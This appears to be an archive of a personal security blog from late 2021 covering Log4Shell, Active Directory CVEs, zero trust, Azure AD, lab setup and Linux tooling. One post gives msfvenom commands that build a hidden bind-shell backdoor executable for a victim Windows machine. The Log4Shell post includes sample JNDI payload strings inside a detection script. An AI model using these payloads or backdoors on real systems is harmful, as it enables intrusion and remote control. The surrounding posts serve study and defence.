Dec 30, 2021

Multi-Layered Approach

An excellent webcast from Eran Livne (Qualys) about a multi-layered approach to addressing the Log4Shell vulnerabilities. Watch the on-demand webcast if you want.

There is also a great demo on how to use a multi-layered approach with Qualys to perform a Log4Shell assessment (remote scan, authenticated scan, agent, inventory scan, prioritization, external exposure/Shodan, containers, images, patch management, mitigation actions, EDR).

My quick notes:

  1. See what your attackers see
  2. Find where you are vulnerable
    • Vulnerability scan
    • In-depth vulnerability scan
    • Inventory scan
    • Protect your container/image
  3. Remediation based on priorities
  4. Monitor for attack in progress

Dec 27, 2021

Lab21 Architecture Design

I have been deciding between VMware Player and VirtualBox as the virtualization tool for my Lab21. Both have their own advantages.

There are 3 types of networking in virtualization tools: NAT, host-only, and bridged.

  1. NAT - Most commonly used.
  2. Host-only - Mostly for private use.
  3. Bridged - For advanced users only.

While doing my research on which tool to use, I came across an interesting video running an OpenWrt router image on VirtualBox in a "host-only + bridged" environment.

Watching the video gave me more ideas about how to design the Lab21 architecture.


Dec 23, 2021

Weaponise Exploits for samAccountName Spoofing (CVE-2021-42278) & Domain Controller Impersonation (CVE-2021-42287)

An exploit that lets a regular domain user impersonate a domain controller has been released!

In November 2021, Microsoft released patches to address two (2) vulnerabilities that affect Windows Active Directory domain controllers: samAccountName Spoofing and Domain Controller Impersonation.

Both vulnerabilities, samAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287), allow an adversary with access to low-privileged domain user credentials to obtain a Kerberos service ticket for a domain controller's computer account. This effectively allows a regular domain user to take control of a domain controller.

Mitigation / Detection

It is recommended to install the Microsoft patch (KB5008602) to mitigate this attack. The patch fixes the PAC confusion and S4U2self issues described earlier.

Another quick fix is setting the Machine Account Quota to 0, which stops low-privileged users from being able to create machine accounts. Other than that, remove Authenticated Users from the SeMachineAccountPrivilege user right and add Domain Admins or another group of allowed accounts instead.

Dec 22, 2021

Log4j Scanner

By now, everyone should have heard of the Log4j RCE vulnerabilities (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105).

There is an open-source scanner called "Log4j Scanner", released by CISA in collaboration with the broader cybersecurity community.

Other than CISA's tool, Metasploit has added a module called Log4Shell HTTP Scanner, which is capable of identifying vulnerable instances via pre-determined HTTP request injection points.

Known impacted software includes Apache Struts 2, VMware vCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki and Apache OFBiz.

Dec 20, 2021

Log4Shell: RCE 0-day exploit found in log4j (a Java logging package)

On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string.

Given how ubiquitous this library is, the impact of a successful exploit (full server control), and how easy it is to exploit, this vulnerability is quite severe. The exploit is also known as "Log4Shell".

The 0-day was tweeted along with a POC posted on GitHub. It has now been published as CVE-2021-44228.

More resources are available at https://log4shell.com/

Impact

Many services are vulnerable to this exploit, including cloud services (Steam, Apple iCloud), apps like Minecraft and Apache Struts, and any software that embeds Log4j as its logging package.

Affected Apache Log4j Versions

From the initial investigation, almost all versions of Log4j from v2.0 to v2.14.1 are vulnerable, and version 1 of Log4j is vulnerable too.

How the exploit works

  • A server with a vulnerable Log4j version installed/embedded.
  • An endpoint using any protocol (HTTP, TCP, ...) that allows an attacker to send the exploit string.
  • A log statement that logs the string received from the requester.
  • An outgoing connection to an attacker-controlled LDAP or RMI server.

This means that by limiting outgoing connections we can prevent the exploit class from being loaded and so mitigate the vulnerability. However, it is not enough to block just the default ports, LDAP (389/tcp) and RMI (1099/tcp/udp), because the attacker can host the exploit payload on any arbitrary port.

It might be possible to use application-layer firewall inspection to restrict outgoing protocols, i.e. LDAP and RMI should be blocked regardless of port.

Alternatively, one might deploy an HTTP proxy and allow outgoing traffic only through the proxy, since LDAP and RMI do not work over an HTTP proxy.
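A detection-side complement to the egress controls above, added here as an example that is not part of the original post: a small Python checker that collapses the common obfuscated forms of the lookup string (${lower:x}, ${upper:x}, ${...:-x}) and reports the scheme and host of every JNDI lookup found in log lines. The log lines are constructed samples.

```python
import re

# Added example (not from the original post): detect Log4Shell-style JNDI
# lookups in log lines, including common obfuscated forms, so exploitation
# attempts are visible even when outbound LDAP/RMI is already blocked.

# Inner lookups used to break the literal "jndi" substring apart:
#   ${lower:j} / ${upper:N}   -> the single character
#   ${::-j} / ${env:NOPE:-j}  -> the default value after ":-"
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}])\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}])\}")
# After normalisation the payload reads ${jndi:<scheme>://<host>[:<port>]/...}
_JNDI = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/${}\s:]+)(?::(\d+))?",
    re.IGNORECASE,
)


def normalize(text: str) -> str:
    """Collapse nested ${lower:x}/${upper:x}/${...:-x} lookups until stable."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def find_jndi(line: str):
    """Return (scheme, host, port) for every JNDI lookup found in one line."""
    hits = []
    for m in _JNDI.finditer(normalize(line)):
        scheme, host, port = m.group(1).lower(), m.group(2), m.group(3)
        hits.append((scheme, host, int(port) if port else None))
    return hits


def scan_log(lines):
    """Return (line_number, scheme, host, port) for each suspicious line."""
    return [(n, *hit) for n, line in enumerate(lines, start=1) for hit in find_jndi(line)]


# Constructed sample access-log lines (not real traffic): a plain payload,
# one obfuscated with ${lower:} and ${::-}, and a benign request.
SAMPLE_LOG = [
    'GET / HTTP/1.1 UA="${jndi:ldap://203.0.113.10:1389/a}"',
    'GET /login HTTP/1.1 UA="${${lower:j}${::-n}${lower:d}i:${lower:r}mi://example.invalid/x}"',
    'GET /health HTTP/1.1 UA="Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, host, port in scan_log(SAMPLE_LOG):
        print("line %d: %s lookup to %s port %s" % (n, scheme, host, port))
```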

Dec 17, 2021

What Is Zero Trust Security Architecture

Zero Trust is a shift of network defenses toward a more comprehensive IT security model that allows organizations to restrict access controls to networks, applications, and environment without sacrificing performance and user experience.

~ McAfee


Nowadays, many organizations are adopting Zero Trust (ZT) as an element of their trust network architecture and enterprise security.

ZT is a model which can be simply applied to:

  • network architecture
  • authentication and authorization architecture
  • cloud and container architecture 

 

Three (3) Approaches to Zero Trust Architecture:

  • Enhanced Identity Governance (with MFA)
  • Micro-segmentation
  • Network infrastructure and software-defined perimeters

 

Zero Trust Access (ZTA) Vs. Zero Trust Network Architecture (ZTNA)

ZTA relies on the organization's Identity and Access Management (IAM) policies, often requiring MFA as a way to verify that users are who they say they are. Additionally, ZTA usually includes maintaining a continuous inventory of devices and users connecting to the network while continuously scanning for new access.

While ZTA focuses on who and what connects to a network, ZTNA focuses on who and what can connect to applications located on the network. ZTNA places the applications behind a gate called a “proxy point,” creating a secure, encrypted tunnel that data travels across. This makes it easier to secure remote users and entities without having to use a VPN.


Five use cases for zero trust:

  1. Enterprise satellites
  2. Multi-cloud architecture
  3. Managing third-party, non-employee access
  4. Across enterprise boundaries
  5. Customer-facing services


(Residual) Risks to Zero Trust:

  • Component Configuration
  • Denial of Service (DoS) Attack
  • Stolen Credential

 

Dec 15, 2021

NEW Native Azure AD KERBEROS!!!

This is a short demo showing that Azure AD now supports native Kerberos.


Command lines:

  1. dsregcmd /status
  2. klist 
  3. klist purge
  4. klist get krbtgt

 

Dec 14, 2021

Picking which Azure AD Synchronization Technology!

This is a short video to show you the difference between the 2 Azure AD sync technologies:  AAD Connect vs Cloud Sync.


Notes - 3 rules:

  1. An AAD Connect instance syncs to a single AAD instance.
  2. An AAD instance only syncs with a single AAD Connect instance.
  3. An object can only be replicated by one sync instance.

 

Dec 10, 2021

Mouse Jiggler

Taking the idea from HakByte, we wrote a similar small Python utility and converted it to a Windows EXE.

This mouse jiggler tool prevents the machine from falling asleep by moving the mouse to simulate human input (bypassing screensaver locking).

Then I just converted it to a Windows executable with PyInstaller, using either of these equivalent commands (-F and -w are the short forms of --onefile and --noconsole):

pyinstaller --onefile --noconsole mouse_jiggler.py

pyinstaller -F -w mouse_jiggler.py

Dec 6, 2021

Linux OS for Lab21

I have shortlisted a few Linux distributions for the Lab21 project:

  • Ubuntu Desktop 20.04
  • Ubuntu Server 20.04
  • AlmaLinux 8.5
  • Rocky Linux 8.5


Other Linux distributions that are still under consideration:

  • Kali Linux
  • Fedora Linux
  • CentOS Linux


Virtualization options:

  • VMware Workstation Player
  • VirtualBox

Dec 5, 2021

OpenShift and Kubernetes

 



These two videos quickly explain what Kubernetes and OpenShift are.

Dec 3, 2021

Start of Lab21 Project

Today, I start my "Lab-21" project.

All the information will be documented at GitHub repository "Lab21". 


Links:

  • https://github.com/myseq/Lab21

Network Forensic Analysis Tool (NFAT)

BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files).

It includes: password extraction, building a network map, reconstructing TCP sessions, and extracting hashes of encrypted passwords for offline brute-force attacks.

Two (2) BruteShark versions are available: a GUI-based application (Windows) and a Command Line Interface tool (Windows and Linux).

BruteSharkCLI demo (BruteSharkCli.gif)


Nov 30, 2021

Run Python Code on WhatsApp


Ever thought of running simple Python code on your WhatsApp (mobile phone)?

In this tutorial, the author shows how to convert regular WhatsApp chats to Python code and execute them on WhatsApp. The project is a small IDE that runs on WhatsApp and can do everything Python can.

In the full tutorial, the author creates a bot to run Python code on WhatsApp, which is like creating his own code editor.

Nov 29, 2021

IT vs. OT - What is OT and how is it different from IT

 

IT vs. OT

In this video, join James Cabe and Anthony Bartolo as they discuss how Microsoft is approaching cybersecurity for Industry 4.0 using Azure Defender for IoT, including:

  • the differences between Operational Technology (OT) and Industrial Control Systems (ICS)
  • how this compares to the modern Internet of Things (IoT)
  • the challenges of securing OT networks
  • how ladder logic can cause cascading impacts
  • how to use the Purdue model to help with communications between the IT and OT security teams as they build a cohesive end-to-end protection solution for modern cyber attacks

Nov 28, 2021

Windows Shellcode Behind Closed Port

This is a simple tactic to hide a TCP shellcode on the Windows platform.

With msfvenom, generate a payload for the victim PC (Windows machine) using the shell_hidden_bind_tcp payload and output a file in .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker's IP] lport=[TCP_Port] -f exe > file.exe

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.203 lport=4321 -f exe > file.exe

This hidden bind TCP shell only accepts connections from the configured IP address (AHOST) and responds with an RST packet to any other connection. This makes the port appear closed, allowing us to disguise the shellcode.

With netstat, the port will appear as LISTENING. However, when scanning the port with any port scanner, we will get a "closed" state. To connect to the backdoor (from the AHOST IP address), use netcat.

Below is the description at Rapid7.

Description

Listen for a connection from a certain IP and spawn a command shell. The shellcode will reply with an RST packet if the connection is not coming from the IP defined in AHOST. This way the port will appear as "closed", helping us to hide the shellcode.


Author(s)

    vlad902 <vlad902@gmail.com>
    sd
    Borja Merino <bmerinofe@gmail.com>

Platform

Windows


Architectures

x86


Nov 27, 2021

Abhinavsingh Proxy.py

Do you need a lightweight proxy server that supports HTTP/HTTPS/HTTP2/WebSockets to facilitate end-to-end testing?

Here's a stripped-down summary of a lightweight proxy server written in Python.

 

Summary:

  • Fast, scalable and lightweight
  • Programmable (with plugins)
  • Real time dashboard
  • Supports: HTTP (1.0, 1.1, 2.0), HTTPS and websockets
  • IPv4 and IPv6 support
  • Basic authentication support

 

Nov 26, 2021

Azure Stormspotter

 

StormSpotter

A visualization pentest tool for Azure subscriptions.

Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

You can run it with or without Docker. Just follow the instructions at https://github.com/Azure/Stormspotter

 


Nov 25, 2021

Guide and Tools for AD Kill Chain Attack & Defense

Tushar was kind enough to compile a complete guide and set of tools for Active Directory kill chain attack and defense.

It covers the tactics, techniques, and procedures (TTPs) attackers leverage to compromise AD, along with guidance on mitigation, detection, and prevention:

  1. Discovery
  2. Privilege Escalation
  3. Domain Trusts
  4. Lateral Movement
  5. Defense Evasion
  6. OpSec
  7. Credential Dumping
  8. Persistence
  9. Tools, Scripts, eBooks, Cheatsheets
  10. Defense and Detection
  11. Active Directory Security Checks

Nov 24, 2021

Consistent network interface device naming

Ever wondered why the traditional network interface name such as eth0 is nowadays renamed to something like ens33?

This is known as Predictable Network Interface Naming and has been part of systemd/udev since v197.

In the past, the UNIX naming scheme assigned names in the order hardware was probed, which is not fixed and may change between reboots. Since systemd v197, the interface name depends on the physical location of the hardware and can be predicted by looking at lspci or lshw output. Unpredictable names can have serious security implications, for example in firewall rules that are written for specific interface names and are therefore very sensitive to names changing unpredictably.

With systemd 197, different naming policies were added to systemd/udevd by default. The following naming schemes for network interfaces are now supported natively by udev:
  1. Names incorporating firmware/BIOS-provided index numbers for on-board devices (example: eno1)
  2. Names incorporating firmware/BIOS-provided PCI Express hotplug slot index numbers (example: ens1)
  3. Names incorporating the physical/geographical location of the connector of the hardware (example: enp2s0)
  4. Names incorporating the interface's MAC address (example: enx78e7d1ea46da)
  5. Classic, unpredictable kernel-native ethX naming (example: eth0)

By default, systemd v197 names interfaces following policy 1) if that information from the firmware is applicable and available, falling back to 2) and subsequently 3), 4) and 5).

Below is the network interface naming hierarchy captured from the Red Hat Enterprise Linux documentation.

Network interface device naming hierarchy

When consistent device naming is enabled (the default), the udev device manager generates device names based on the following schemes (scheme number, description, example):

  1. Device names incorporate firmware- or BIOS-provided index numbers for onboard devices. If this information is not available or applicable, udev uses scheme 2. (example: eno1)
  2. Device names incorporate firmware- or BIOS-provided PCI Express (PCIe) hot plug slot index numbers. If this information is not available or applicable, udev uses scheme 3. (example: ens1)
  3. Device names incorporate the physical location of the connector of the hardware. If this information is not available or applicable, udev uses scheme 5. (example: enp2s0)
  4. Device names incorporate the MAC address. Red Hat Enterprise Linux does not use this scheme by default, but administrators can optionally use it. (example: enx525400d5e0fb)
  5. The traditional unpredictable kernel naming scheme. If udev cannot apply any of the other schemes, the device manager uses this scheme. (example: eth0)

To disable "Predictable Network Interface Names" (Ubuntu):

  • Edit /etc/default/grub, changing the line from

    GRUB_CMDLINE_LINUX=""

    to

    GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"

  • and, finally, regenerate the GRUB configuration and reboot your system:

    $ sudo grub-mkconfig -o /boot/grub/grub.cfg
    $ sudo update-grub && sudo reboot
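To make the firewall-rule risk concrete, here is an added Python example (not from the original post or the Red Hat documentation) that classifies interface names by the scheme table above and flags firewall rules referencing interfaces that no longer exist on the host. The interface inventory and rules are constructed samples; the rule syntax matched is iptables -i/-o and nftables iifname/oifname.

```python
import re

# Added example (not from the original post): classify interface names by the
# udev naming scheme described above and audit firewall rules for interface
# names that are absent from the host, the failure mode the text warns about.

# Scheme numbers follow the Red Hat table quoted above.
_SCHEMES = [
    (1, re.compile(r"^(en|wl|ww)o\d+$")),                    # firmware on-board index, e.g. eno1
    (2, re.compile(r"^(en|wl|ww)s\d+(f\d+)?(d\d+)?$")),      # PCIe hotplug slot index, e.g. ens1
    (3, re.compile(r"^(en|wl|ww)p\d+s\d+(f\d+)?(d\d+)?$")),  # physical/PCI location, e.g. enp2s0
    (4, re.compile(r"^(en|wl|ww)x[0-9a-f]{12}$")),           # MAC address, e.g. enx525400d5e0fb
    (5, re.compile(r"^(eth|wlan)\d+$")),                     # classic kernel naming, e.g. eth0
]


def naming_scheme(name: str):
    """Return the scheme number (1-5) for an interface name, or None if unknown."""
    for number, pattern in _SCHEMES:
        if pattern.match(name):
            return number
    return None


# Match "-i <name>" / "-o <name>" (iptables) and iifname/oifname <name> (nftables).
_RULE_IFACE = re.compile(r'(?:-i|-o|--in-interface|--out-interface|iifname|oifname)\s+"?([A-Za-z0-9]+)')


def audit_rules(rules, present):
    """Return [(rule, iface, scheme)] for rules that reference an interface not on the host."""
    findings = []
    for rule in rules:
        for iface in _RULE_IFACE.findall(rule):
            if iface not in present:
                findings.append((rule, iface, naming_scheme(iface)))
    return findings


# Constructed sample: rules written for the classic names, on a host that now
# uses predictable names, so the eth0/eth1 rules silently match nothing.
PRESENT_IFACES = {"lo", "enp2s0", "ens1"}
FIREWALL_RULES = [
    "-A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT",
    "-A INPUT -i enp2s0 -p tcp --dport 22 -j ACCEPT",
    'iifname "eth1" tcp dport 80 drop',
]

if __name__ == "__main__":
    for rule, iface, scheme in audit_rules(FIREWALL_RULES, PRESENT_IFACES):
        print("stale interface %s (scheme %s) in rule: %s" % (iface, scheme, rule))
```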


Nov 23, 2021

Presentation from Command Line

Today, I'm going to share my view on the command line presentation tools that I have tried.

The good and bad of command line presentation tools:

- Will never win any design award.
- Fonts might be too small.
+ Helps you to FOCUS.

 

mdp - Markdown Presentation

  • uses single markdown text file.
  • can be converted to HTML and PDF (with additional tools).


tpp - Text Presentation Program

  • uses own formatting (instead of markdown).
  • colorful

 

vimdeck - VIM as a presentation tool

  • uses markdown + ruby + SyntaxRange
  • supports H1/H2/Images (to ascii), and fenced code blocks.
  • supports highlighting syntax.


vtmc - Video Terminal Master of Ceremonies

 

tkn - Terminal Keynote

  • uses ruby and png files.
  • supports code, center, block, image, section.
  • can be converted to PDF.

 

tiptip - Terminal Plain-text Presentations

  • uses CoffeeScript.

 

patat - Presentation Atop The ANSI Terminal

  • uses pandoc (markdown/LaTeX) to parse the slides.
  • largely based upon MDP and VTMC
  • support different running options.
  • support YAML configuration (at 2 places).

 

lookatme - LookAtMe

  • uses markdown notation.
  • supports live code, images and a live terminal.
  • options for different types of rendering.

 

Links:

  • mdp - https://github.com/visit1985/mdp
  • tpp - https://synflood.at/tpp.html
  • vimdeck - https://github.com/tybenz/vimdeck
  • vtmc - https://github.com/jclulow/vtmc
  • vtmc_box - https://github.com/justin2004/vtmc_box
  • tkn - https://github.com/fxn/tkn
  • tiptip - https://github.com/felixrabe-attic/mcrio--tiptip
  • patat - https://github.com/jaspervdj/patat
  • lookatme - https://github.com/d0c-s4vage/lookatme

Nov 22, 2021

Side-by-Side Comparison with Linux command

"sdiff" a very useful utility to compare the result side-by-side.  For example, I can compare the output of the 2 nmap results as below:

 $ sdiff -bW <(nmap -sV -p 80 192.168.31.1) <(nmap -sV -p 80 192.168.1.254) 


Comparing port 80

A more complex example, such as:

$ sdiff -bW <(nmap --script ssh2-enum-algos -sV -p 22 23.96.21.205 -Pn) <(nmap --script ssh2-enum-algos -sV -p 22 127.0.0.1)